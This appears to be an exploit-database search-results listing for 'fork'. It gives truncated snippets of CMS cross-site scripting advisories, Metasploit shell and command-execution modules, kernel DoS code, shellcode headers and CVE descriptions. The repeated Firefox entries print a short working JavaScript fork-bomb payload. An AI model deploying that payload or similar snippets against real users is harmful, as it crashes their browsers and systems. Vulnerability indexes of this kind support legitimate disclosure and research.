1720 matches found
Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/51045/info Fork CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. An attacker may leverage these issues to execute arbitrary script cod...
Unix Command Shell, Bind TCP (via perl) IPv6
Listen for a connection and spawn a command shell via perl This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 152 include Msf::Payload::Single include Msf::Sessions::CommandShellOptio...
Fork CMS 3.1.5 Cross Site Scripting
Exploit Title: Fork CMS v.3.1.5 - Reflected Cross-Site Scripting XSS Vulnerability Script Page : http://www.fork-cms.com/ Date: 13-12-2011 Author : RandomStorm - http://www.randomstorm.com Avram Marius Gabriel d3v1l Tested on: Windows XP & Vista IE9 Cross-Site Scripting XSS on Front Site POC:...
Spreecommerce 0.60.1 Arbitrary Command Execution
This module exploits an arbitrary command execution vulnerability in the Spreecommerce search. Unvalidated input is called via the Ruby send method allowing command execution. This module requires Metasploit: https://metasploit.com/download Current source:...
Spreecommerce < 0.50.0 Arbitrary Command Execution
Exploit for unix platform in category remote exploits $Id: spreesearchlogicexec.rb 12397 2011-04-21 19:38:42Z swtornio $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more informatio...
Linux Kernel <= 2.6.37 Local Kernel Denial of Service
No description provided by source. / Linux Kernel = 2.6.37 local kernel DoS CVE-2010-4165 ======================================================= A divide by 0 error occurs in tcpselectinitialwindow when processing user supplied TCPMAXSEG facilitating a local denial-of-service condition kernel...
Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)
Linux Kernel 2.6.37 - Local Kernel Denial of Service 1 / Linux Kernel include include include include include int main int optval, optlen, ret, sd, sd2, pid; char host = "localhost"; struct sockaddrin locAddr; struct sockaddrin servAddr; struct sockaddrin dstAddr; printf" Linux Kernel...
bsd/x86 - portbind + fork shellcode (111 bytes)
Exploit for bsd/x86 platform in category shellcode / -------------- FreeBSD/x86 - portbind shell + fork 111 bytes-------------------- AUTHOR : Tosh OS : BSDx86 Tested on FreeBSD 8.1 EMAIL : email protected / include include include char shellcode =...
BSD x86 portbind + fork shellcode 111 bytes
BSD x86 portbind + fork shellcode 111 bytes. Shellcode exploit for bsdx86 platform / -------------- FreeBSD/x86 - portbind shell + fork 111 bytes-------------------- AUTHOR : Tosh OS : BSDx86 Tested on FreeBSD 8.1 EMAIL : [email protected] / include include include char shellcode =...
Joostina 1.3.0 Cross Site Scripting
Hello Full-Disclosure! I want to warn you about Cross-Site Scripting vulnerability in Joostina. Joostina CMS - it's a fork of Joomla. This vulnerability is similar to XSS vulnerability in Joomla 1.0.x found by Aung Khant...
FreeBSD 8.17.3 - vm.pmap Local Race Condition
FreeBSD 8.17.3 - vm.pmap Local Race Condition -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 FreeBSD 8.1/7.3 vm.pmap kernel local race condition Author: Maksymilian Arciemowicz http://SecurityReason.com http://lu.cxib.net Date: - - Dis.: 09.07.2010 - - Pub.: 07.09.2010 Affected Software verified: ...
Fedora 11 : kernel-2.6.30.10-105.2.23.fc11 (2010-1804)
Security bugs: CVE-2010-0410 CVE-2010-0415 563091 Also fixes: xfs: xfsswapextents needs to handle dynamic fork offsets F12510823 Possible system lockups caused by the fix for bug 559100 in the previous updates. Note that Tenable Network Security has extracted the preceding description block...
CVE-2010-2441
WebKit does not properly restrict focus changes, which allows remote attackers to read keystrokes via "cross-domain IFRAME gadgets," a different vulnerability than CVE-2010-1126, CVE-2010-1422, and CVE-2010-2295...
CVE-2010-1413
WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, sends NTLM credentials in cleartext in unspecified circumstances, which allows man-in-the-middle attackers to obtain sensitive information via unspecified vectors...
CVE-2010-1405
Use-after-free vulnerability in WebKit in Apple Safari before 5.0 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1 on Mac OS X 10.4, allows remote attackers to execute arbitrary code or cause a denial of service application crash via an HTML element that has custom vertical positioning...
Linux/x86 alphanumeric Bomb FORK Shellcode 117 Bytes
No description provided by source. / | Title: Linux/x86 alphanumeric Bomb FORK Shellcode 117 Bytes | Type: Shellcode | Author: agix | Platform: Linux X86 / 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ ...
Linux/x86 alphanumeric Bomb FORK Shellcode 117 Bytes
Linux/x86 alphanumeric Bomb FORK Shellcode 117 Bytes. Shellcode exploit for linux platform / | Title: Linux/x86 alphanumeric Bomb FORK Shellcode 117 Bytes | Type: Shellcode | Author: agix | Platform: Linux X86 / 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /...
Mozilla Firefox 3.6.3 - Fork Bomb (Denial of Service)
var a = 'javascript:"DrIDE\s FireFox Fork Bomb!"'; loop1; function loop1 window.opena; setIntervalloop1,1;...
Mozilla Firefox 3.6.3 - Fork Bomb (Denial of Service)
Mozilla Firefox 3.6.3 - Fork Bomb Denial of Service var a = 'javascript:"DrIDE\s FireFox Fork Bomb!"'; loop1; function loop1 window.opena; setIntervalloop1,1;...
Firefox 3.6.3 Fork Bomb DoS
Exploit for windows platform in category dos / poc =========================== Firefox 3.6.3 Fork Bomb DoS =========================== loop1; var a = 'javascript:"DrIDE\s FireFox Fork Bomb!"'; function loop1 window.opena; setIntervalloop1,1; 0day.today 2018-01-10...